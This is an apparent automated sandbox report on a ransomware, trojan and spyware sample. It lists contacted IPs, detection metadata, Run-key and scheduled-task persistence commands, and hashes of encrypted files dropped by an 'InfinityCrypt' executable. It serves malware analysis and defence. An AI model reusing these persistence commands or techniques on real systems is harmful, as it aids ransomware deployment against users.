                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.8
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.7
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.1
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.237
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.2
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.236
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.239
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.0
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.238
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.5
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.233
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.6
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.232
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.3
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.235
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.4
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.234
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.9
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    95.1.200.7
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.231
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    95.1.200.8
                                                                                                                                                    unknownTurkey
                                                                                                                                                    9121TTNETTRfalse
                                                                                                                                                    87.98.177.230
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.249
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.248
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.247
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.246
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.97
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.96
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.99
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.98
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.241
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.93
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.240
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.92
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.95
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.94
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.245
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.244
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.243
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.91
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.242
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.90
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.229
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.226
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.225
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.228
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.227
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.222
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.221
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.224
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.223
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.220
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.252
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.251
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.250
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.255
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.254
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.253
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    93.107.12.20
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.21
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.22
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.23
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.24
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.25
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.26
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.27
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.28
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    93.107.12.29
                                                                                                                                                    unknownIreland
                                                                                                                                                    15502VODAFONE-IRELAND-ASNIEfalse
                                                                                                                                                    87.98.178.227
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.79
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.178.226
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.179.78
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                    Analysis ID:712625
                                                                                                                                                    Start date and time:2022-09-29 14:57:45 +02:00
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 16m 29s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:07bb0738.exe
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:63
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.rans.troj.spyw.expl.evad.winEXE@113/217@112/100
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 99.2% (good quality ratio 97.4%)
                                                                                                                                                    • Quality average: 90.9%
                                                                                                                                                    • Quality standard deviation: 18.5%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                                    • Number of executed functions: 89
                                                                                                                                                    • Number of non-executed functions: 59
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Connection to analysis system has been lost, crash info: Unknown
                                                                                                                                                    • Exclude process from analysis (whitelisted): Conhost.exe, backgroundTaskHost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 8.253.207.120
                                                                                                                                                    • Excluded domains from analysis (whitelisted): google.com, fs.microsoft.com, searchaccount.org, login.live.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, ashamedice.com, powertoolsforyou.com
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    14:59:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\Desktop\Endermanch@Birele.exe
                                                                                                                                                    14:59:57Task SchedulerRun new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 2277809790 &amp;&amp; exit
                                                                                                                                                    14:59:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run system C:\Users\user\Desktop\Endermanch@Birele.exe
                                                                                                                                                    15:00:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Antivirus "C:\Program Files (x86)\AnVi\avt.exe" -noscan
                                                                                                                                                    15:01:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Client Server Runtime Subsystem "C:\ProgramData\Windows\csrss.exe"
                                                                                                                                                    No context
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    yandex.ru4d44bed6.exeGet hashmaliciousBrowse
                                                                                                                                                    • 77.88.55.50
                                                                                                                                                    63416c4d.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.255.255.80
                                                                                                                                                    bpkAAJptGv.exeGet hashmaliciousBrowse
                                                                                                                                                    • 5.255.255.80
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    EbxZnWRh46.exeGet hashmaliciousBrowse
                                                                                                                                                    • 77.88.21.158
                                                                                                                                                    SIfMYHJlUY.exeGet hashmaliciousBrowse
                                                                                                                                                    • 77.88.21.158
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    736Av81NTH.exeGet hashmaliciousBrowse
                                                                                                                                                    • 77.88.21.158
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    https://vk.cc/cgXapvGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.251.134
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                    • 87.250.250.50
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    No context
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):423472
                                                                                                                                                    Entropy (8bit):7.9995502260613724
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:12288:MTJ8NWHYPZXXdHnaCejthBxrBu4/8wwinLtqmynZ:iJPQ/kLxrBoin8myZ
                                                                                                                                                    MD5:08389BA242FC8CB684D2D1854EF12052
                                                                                                                                                    SHA1:33607FFB3EE814F54539A487B302BB899CBAF37E
                                                                                                                                                    SHA-256:AA9886648B98286581B4DAC9806D7A28924CF2F6CF6EDBAF50C46C6357E20D51
                                                                                                                                                    SHA-512:B80EC19D419D82E529EE2E9D2540BF4E6B49FDB3A357C2746986C0B7EB295B23A2565021D8AB3AB265A1167ED2B21EEE9406F5AE0FC686829C9A801768109243
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:P......p.W......_*.. .`.o.........h.......{.b!W.....H...........i..W].x.e.B.6.@b..V....^-0..R'o._...vp.. (..[......{..R....k...|{ .WWW.V...d...uRG.....ka..G..U..\...rSrk.LR4.....\U.x..TwH."W.59.[....P..`]..).Ia.2>Go....~...s..Q..w.Ia$;....Y@Z..2.9.....................V...W...$L..!.<3{.G?.P30.....*.G...J]...@..$O.w.@.#........mzl.^7S.....:u.(.^......D{Q..b..../b.6.....9.u.....Q08...Z/.gx....".mw.#.u.BR.K.e..... ."q....K...k..=jH!h..y....~?.8.X...Wj.=.=e.@......(A\{....M.....B.W...Q.LZ3....W.....^.D.?$):...g..k....[...z.X.......D.X..bV.C. .4N.KD.H..W.#/-.X.Nm.]....,wlt..@.}..Uu1H.Ez....Y. .....".....\[.U.H.Uk.IM_..i3.F.......7.IH%.11.4.3@;...>..u...{..2..$i.TW%"....3.....Yfk.'.lq..S.\cg..>..$.......V....w.v.i.Nw*.%3.I........7[F..H.8.T...L\0B..E...C....*m...Xc....w........u.z..F.H..`...p...3:...o.N.g~...Q..h..f../...~L.b|%....,.31..E...l.k.......d.1..j........i.(.@.LA.Z.,|<.........!|.h..M}k....7.....[..I...ML.G..?.r.u.....@0...F......
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):84000
                                                                                                                                                    Entropy (8bit):7.997866630847671
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:1536:otSFySChHqUuBs77umBR9dSZ3mh9n3p57jTjN3APjgGjHMr6+2:osdCpFuBs77jjvSZ3+h/hAPjpsrT2
                                                                                                                                                    MD5:C2D613D88C04C0983240C3355BD8A552
                                                                                                                                                    SHA1:42E7287E801F4D3334FC17E3B3EE1618B088921B
                                                                                                                                                    SHA-256:6DEBCD2DF1374335813B8E414A4BBECA428C8DE68675AD86AE0080E08B2754E1
                                                                                                                                                    SHA-512:BC0D4A1C6126145AE834A4D7AB96489CF631E30BC6A1B068A1D677C26E1F38E8519634DDECABC686B8383B9B646CD1E007FACBF08D1FCE130ACBEDEBB90D509C
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:P......p.W......_*.. .`.o.........h.......{.....Vt.X.......d2.~...*.v.fAL3K........V_!...'.\..,.H^f.t%y..{.p........-4H....z.lt4.....f.;M.=...My.E.....hqZ=..MZ..CNM@....65...2..A;.V.YX..v...(..X..a.c...U.b.px2....S....i..v..B...Vn.;.7... e....]C..-....$........0...1`~....e..k...XHud.}.4..>..i..>a..YA..S-.....}...H.bB...$^...Q.."<q.H...4&c........N.l&.v..S..K2B.H...o..M..,..L.t......HfZ.a.........&.i.v.F.s..`.0....l.jD.]t.........}.o5.N.x.. F"..Q-.{.P0...q...2[R..C...]U.H..==Lt...`.....w.*.5......M.u7.&..#;Fe9.a.o..E.xDc..Rv..._.....2t.w...c%u)8.....-...8.Hx3..:'`X...gBY....^.......i'....$..'h[|D.bbA/'.ug..v&..U>E.."..|./...z....}..d>.@i^..E........{......Ph.C.WZ.X.......E:.k.....-.T"....r...Gj..[M...+..p.y...q.....$.#..v......7.6._..-4..hR).)...PcW........I...D............*b..Y...q....G.U.mwN.....7.;.t,..o,:v.Gj.Q.M'....n..L~zm..[v...%..B.s#..K&<.tN.|../l...r...P.2Djs...........`F....`j6... ..T..4%).J..(....d&e.......3.~.h...O.3=]...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):720
                                                                                                                                                    Entropy (8bit):7.71078756237367
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:hk8xZKZdijOOLL5BOJfmERpTvgNQOisXfw/LQ4ixw/CsEfMzTkbYsDRm01:B0G3BONmYTi/ozx/jVbsNm01
                                                                                                                                                    MD5:DDF20F27AF91D2A1C7648D661516040C
                                                                                                                                                    SHA1:D15A5A61F0B99BC94554029561CCE673E4D7F3EB
                                                                                                                                                    SHA-256:7D64F260B142640CF2717EBBC5EC5326B05267C56D3D0FB921036427BA534950
                                                                                                                                                    SHA-512:0A22D95D5D223A75540E71F60046166C73837E2FF800723C4BC0A136F14BB1C91D831BB8D652C505F4F033EF8AE48B06B1A6B7A6EA93C840B76C544CCB160EBF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...i. _.<0...l...[...p$....5..<G...i..1.N...s..J.M...e.......i...\.1brHE>3.].7.I..'....k.k.@u1V.. ..T.IF.m..$.^i...s....x.EW..DA.^..P.=8..Q:.g.o...e.U`O.l....a...A.|.f.......]).d....P....a.F...Wt.2A.....].&E44..uAgi....h"a.7'.cw.$l....0.#..s8I.l.y."..K.$....6.1U~:...,@b)....4%...\.....rp..VX.M..bg.{...g...F..X^h......b1W.U....(D.6sv...2.0"..W..|.......F!k.y..U[6..| /...}W.x#...}]hL.Z..g.G.7.....a...p.y.\Q.ugW.9..............9d.<.A.`N9....~..jOm..x.d,...d:.$u...K...P...+.^...Z.y*.[....e6..'..x_.=....,..w.....g..#..0.x..o.....|...8c...W..$../K.L..Z+......,....e...H8.[.3..C..W...:pl....... <.$..7......&.3.o.yl.....0...]....u......I..Y.=...6$..i...=.0..?U..RAX..H5O.F.a./v..Vv.,..k
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):33776
                                                                                                                                                    Entropy (8bit):7.994437991138896
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:Mz5E48v8rS6JR7JFrkrHURdmxmdPFqCoKDw4q/ke:T5QrkIRdhFqRK+p
                                                                                                                                                    MD5:7754C5756DBD5DB105520A2930912FF8
                                                                                                                                                    SHA1:C131D227C7D9FF2C6C1C6736CD1E9FCB4E736858
                                                                                                                                                    SHA-256:5886E9E1C5382C020B85F67FD39CEC3EABE55B069BBE0F9FC5F87918D6BBE726
                                                                                                                                                    SHA-512:2BB251933E9B8D1CA40737F9CDB45F28214221AB19AE6D2B6553DCCB188E1FA624A8989FC1BB801AECED6EA1ADDAFD1536C42F1E0ECE93E3F7BA0416433ED2A6
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:|.....,..I.T.j5?...>J..S.C.h.64.......;..zIL.o^.....I...6..>c...S......B.C.G..?n.u.i@...R" N.n..p#.1.\..|...X..3..Cz..[P:f.t]c*5...]h'..V........1'X....v..p.L.a...1Nm+...u........W......r@,.|.t@H.^.H$!%!4.....:V.....r.X.......92......,....._.(.......So..b$.......T%O.vQ..8..!.S..vR....b5.6r1G.;...F..tE....w.....dDhs.....8\5g...... .P...4j.\6,RY.a6.ial..........xr..i..1DA.....Sn..6Z...i....9....{..y.j..."x.H...&.0m.R........5;...!.....v5....v...:.-?..e.>mu......N.......k2....y.r...1.Y...8.&EWb..U5.M...k..TI$......2O.Ga..v CG.4.r..c5~....%..?...r....j"..f.$c.;..e.}i.....U..#>........@.B.U.\..6<.../..:.]..pG...W mn.JvMl.I..O.v....E.....c........l..$.............W.%.23.......6.Y<.R[...G...M.......I.G....V..T...u..Bx......-.R.A..5Cs.\.[..9........g.;........f..h.(.-.k..H....}3...%..p.9...LP.`........k.<..SjY.6....`.{....w........g>..y..{.?g...S..@.g].#P.x....k......4........7.'........C.\....%.3...\..T.5..U..O....a.TP.0.......w....5..gv...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):33776
                                                                                                                                                    Entropy (8bit):7.994437991138896
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:Mz5E48v8rS6JR7JFrkrHURdmxmdPFqCoKDw4q/ke:T5QrkIRdhFqRK+p
                                                                                                                                                    MD5:7754C5756DBD5DB105520A2930912FF8
                                                                                                                                                    SHA1:C131D227C7D9FF2C6C1C6736CD1E9FCB4E736858
                                                                                                                                                    SHA-256:5886E9E1C5382C020B85F67FD39CEC3EABE55B069BBE0F9FC5F87918D6BBE726
                                                                                                                                                    SHA-512:2BB251933E9B8D1CA40737F9CDB45F28214221AB19AE6D2B6553DCCB188E1FA624A8989FC1BB801AECED6EA1ADDAFD1536C42F1E0ECE93E3F7BA0416433ED2A6
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:|.....,..I.T.j5?...>J..S.C.h.64.......;..zIL.o^.....I...6..>c...S......B.C.G..?n.u.i@...R" N.n..p#.1.\..|...X..3..Cz..[P:f.t]c*5...]h'..V........1'X....v..p.L.a...1Nm+...u........W......r@,.|.t@H.^.H$!%!4.....:V.....r.X.......92......,....._.(.......So..b$.......T%O.vQ..8..!.S..vR....b5.6r1G.;...F..tE....w.....dDhs.....8\5g...... .P...4j.\6,RY.a6.ial..........xr..i..1DA.....Sn..6Z...i....9....{..y.j..."x.H...&.0m.R........5;...!.....v5....v...:.-?..e.>mu......N.......k2....y.r...1.Y...8.&EWb..U5.M...k..TI$......2O.Ga..v CG.4.r..c5~....%..?...r....j"..f.$c.;..e.}i.....U..#>........@.B.U.\..6<.../..:.]..pG...W mn.JvMl.I..O.v....E.....c........l..$.............W.%.23.......6.Y<.R[...G...M.......I.G....V..T...u..Bx......-.R.A..5Cs.\.[..9........g.;........f..h.(.-.k..H....}3...%..p.9...LP.`........k.<..SjY.6....`.{....w........g>..y..{.?g...S..@.g].#P.x....k......4........7.'........C.\....%.3...\..T.5..U..O....a.TP.0.......w....5..gv...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):33776
                                                                                                                                                    Entropy (8bit):7.994437991138896
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:Mz5E48v8rS6JR7JFrkrHURdmxmdPFqCoKDw4q/ke:T5QrkIRdhFqRK+p
                                                                                                                                                    MD5:7754C5756DBD5DB105520A2930912FF8
                                                                                                                                                    SHA1:C131D227C7D9FF2C6C1C6736CD1E9FCB4E736858
                                                                                                                                                    SHA-256:5886E9E1C5382C020B85F67FD39CEC3EABE55B069BBE0F9FC5F87918D6BBE726
                                                                                                                                                    SHA-512:2BB251933E9B8D1CA40737F9CDB45F28214221AB19AE6D2B6553DCCB188E1FA624A8989FC1BB801AECED6EA1ADDAFD1536C42F1E0ECE93E3F7BA0416433ED2A6
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:|.....,..I.T.j5?...>J..S.C.h.64.......;..zIL.o^.....I...6..>c...S......B.C.G..?n.u.i@...R" N.n..p#.1.\..|...X..3..Cz..[P:f.t]c*5...]h'..V........1'X....v..p.L.a...1Nm+...u........W......r@,.|.t@H.^.H$!%!4.....:V.....r.X.......92......,....._.(.......So..b$.......T%O.vQ..8..!.S..vR....b5.6r1G.;...F..tE....w.....dDhs.....8\5g...... .P...4j.\6,RY.a6.ial..........xr..i..1DA.....Sn..6Z...i....9....{..y.j..."x.H...&.0m.R........5;...!.....v5....v...:.-?..e.>mu......N.......k2....y.r...1.Y...8.&EWb..U5.M...k..TI$......2O.Ga..v CG.4.r..c5~....%..?...r....j"..f.$c.;..e.}i.....U..#>........@.B.U.\..6<.../..:.]..pG...W mn.JvMl.I..O.v....E.....c........l..$.............W.%.23.......6.Y<.R[...G...M.......I.G....V..T...u..Bx......-.R.A..5Cs.\.[..9........g.;........f..h.(.-.k..H....}3...%..p.9...LP.`........k.<..SjY.6....`.{....w........g>..y..{.?g...S..@.g].#P.x....k......4........7.'........C.\....%.3...\..T.5..U..O....a.TP.0.......w....5..gv...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):33776
                                                                                                                                                    Entropy (8bit):7.994437991138896
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:Mz5E48v8rS6JR7JFrkrHURdmxmdPFqCoKDw4q/ke:T5QrkIRdhFqRK+p
                                                                                                                                                    MD5:7754C5756DBD5DB105520A2930912FF8
                                                                                                                                                    SHA1:C131D227C7D9FF2C6C1C6736CD1E9FCB4E736858
                                                                                                                                                    SHA-256:5886E9E1C5382C020B85F67FD39CEC3EABE55B069BBE0F9FC5F87918D6BBE726
                                                                                                                                                    SHA-512:2BB251933E9B8D1CA40737F9CDB45F28214221AB19AE6D2B6553DCCB188E1FA624A8989FC1BB801AECED6EA1ADDAFD1536C42F1E0ECE93E3F7BA0416433ED2A6
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:|.....,..I.T.j5?...>J..S.C.h.64.......;..zIL.o^.....I...6..>c...S......B.C.G..?n.u.i@...R" N.n..p#.1.\..|...X..3..Cz..[P:f.t]c*5...]h'..V........1'X....v..p.L.a...1Nm+...u........W......r@,.|.t@H.^.H$!%!4.....:V.....r.X.......92......,....._.(.......So..b$.......T%O.vQ..8..!.S..vR....b5.6r1G.;...F..tE....w.....dDhs.....8\5g...... .P...4j.\6,RY.a6.ial..........xr..i..1DA.....Sn..6Z...i....9....{..y.j..."x.H...&.0m.R........5;...!.....v5....v...:.-?..e.>mu......N.......k2....y.r...1.Y...8.&EWb..U5.M...k..TI$......2O.Ga..v CG.4.r..c5~....%..?...r....j"..f.$c.;..e.}i.....U..#>........@.B.U.\..6<.../..:.]..pG...W mn.JvMl.I..O.v....E.....c........l..$.............W.%.23.......6.Y<.R[...G...M.......I.G....V..T...u..Bx......-.R.A..5Cs.\.[..9........g.;........f..h.(.-.k..H....}3...%..p.9...LP.`........k.<..SjY.6....`.{....w........g>..y..{.?g...S..@.g].#P.x....k......4........7.'........C.\....%.3...\..T.5..U..O....a.TP.0.......w....5..gv...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):33776
                                                                                                                                                    Entropy (8bit):7.994437991138896
                                                                                                                                                    Encrypted:true
